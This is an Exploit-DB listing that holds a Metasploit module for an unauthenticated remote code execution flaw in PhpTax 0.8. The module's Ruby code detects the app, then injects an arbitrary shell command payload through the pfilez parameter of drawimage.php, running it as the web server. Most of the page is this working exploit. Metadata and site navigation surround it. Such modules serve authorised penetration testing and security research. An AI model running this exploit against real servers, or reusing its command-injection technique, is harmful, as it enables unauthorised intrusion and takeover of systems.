PhpTax - 'pfilez' Execution Remote Code Injection (Metasploit)

EDB-ID:

21833

CVE:


EDB Verified:

Author:

Metasploit

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2012-10-10

Vulnerable App: 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
		super(update_info(info,
			'Name'           => "PhpTax pfilez Parameter Exec Remote Code Injection",
			'Description'    => %q{
					This module exploits a vulnerability found in PhpTax, an income tax report
				generator.  When generating a PDF, the icondrawpng() function in drawimage.php
				does not properly handle the pfilez parameter, which will be used in a exec()
				statement, and then results in arbitrary remote code execution under the context
				of the web server.  Please note: authentication is not required to exploit this
				vulnerability.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Jean Pascal Pereira <pereira[at]secbiz.de>',
					'sinn3r'  #Metasploit
				],
			'References'     =>
				[
					['EDB', '21665']
				],
			'Payload'        =>
				{
					'Compat' =>
					{
						'ConnectionType' => 'find',
						'PayloadType'    => 'cmd',
						'RequiredCmd'    => 'generic perl ruby bash telnet python'
					}
				},
			'Platform'       => ['unix', 'linux'],
			'Targets'        =>
				[
					['PhpTax 0.8', {}]
				],
			'Arch'           => ARCH_CMD,
			'Privileged'     => false,
			'DisclosureDate' => "Oct 8 2012",
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('TARGETURI', [true, 'The path to the web application', '/phptax/'])
			], self.class)
	end


	def check
		target_uri.path << '/' if target_uri.path[-1,1] != '/'
		res = send_request_raw({'uri'=>target_uri.path})
		if res and res.body =~ /PHPTAX by William L\. Berggren/
			return Exploit::CheckCode::Detected
		else
			return Exploit::CheckCode::Unknown
		end
	end


	def exploit
		target_uri.path << '/' if target_uri.path[-1,1] != '/'

		print_status("#{rhost}#{rport} - Sending request...")
		res = send_request_cgi({
			'method'   => 'GET',
			'uri'      => "#{target_uri.path}drawimage.php",
			'vars_get' => {
				'pdf'    => 'make',
				'pfilez' => "xxx; #{payload.encoded}"
			}
		})

		handler
	end
end
Tags: Metasploit Framework (MSF)
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services